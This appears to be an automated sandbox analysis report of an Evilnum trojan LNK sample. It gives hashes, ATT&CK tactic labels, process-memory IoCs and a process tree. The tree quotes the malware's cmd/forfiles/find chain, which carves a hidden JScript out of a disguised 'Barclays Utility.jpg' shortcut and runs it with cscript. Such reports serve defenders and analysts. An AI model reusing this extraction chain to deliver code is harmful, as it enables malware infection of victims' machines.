evilnum | 18558a236e6dc15447c4683d38d4cd5c65331f2469b95b65342a1dcc5e4999fe

Analysis

Target

18558a236e6dc15447c4683d38d4cd5c65331f2469b95b65342a1dcc5e4999fe.lnk
Size

95KB
MD5

48e90ca0f344e1a0445936f2d28ae01f
SHA1

ee050a767eaa5227ed40d7a77b7746aea0554ae5
SHA256

18558a236e6dc15447c4683d38d4cd5c65331f2469b95b65342a1dcc5e4999fe
SHA512

2dc34d7e2afb5571bb473c6598315097298b53674321be629443f51c2b0b3dbecfe4b6bfe010801dc36f8e146fed2fd440ee67538bedf4fb0c44fd109d0dc0dc

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1112 wrote to memory of 1692	1112	cmd.exe	28
PID 1112 wrote to memory of 1692	1112	cmd.exe	28
PID 1112 wrote to memory of 1692	1112	cmd.exe	28
PID 1692 wrote to memory of 1688	1692	cmd.exe	29
PID 1692 wrote to memory of 1688	1692	cmd.exe	29
PID 1692 wrote to memory of 1688	1692	cmd.exe	29
PID 1692 wrote to memory of 1644	1692	cmd.exe	30
PID 1692 wrote to memory of 1644	1692	cmd.exe	30
PID 1692 wrote to memory of 1644	1692	cmd.exe	30
PID 1692 wrote to memory of 1536	1692	cmd.exe	31
PID 1692 wrote to memory of 1536	1692	cmd.exe	31
PID 1692 wrote to memory of 1536	1692	cmd.exe	31
PID 1692 wrote to memory of 944	1692	cmd.exe	32
PID 1692 wrote to memory of 944	1692	cmd.exe	32
PID 1692 wrote to memory of 944	1692	cmd.exe	32
PID 1692 wrote to memory of 948	1692	cmd.exe	33
PID 1692 wrote to memory of 948	1692	cmd.exe	33
PID 1692 wrote to memory of 948	1692	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\18558a236e6dc15447c4683d38d4cd5c65331f2469b95b65342a1dcc5e4999fe.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Barclays Utility.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1644
- - C:\Windows\system32\find.exe
    find "RDE3"
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:944
- - C:\Windows\system32\cscript.exe
    cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:948

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/1112-54-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

Filesize
8KB

Download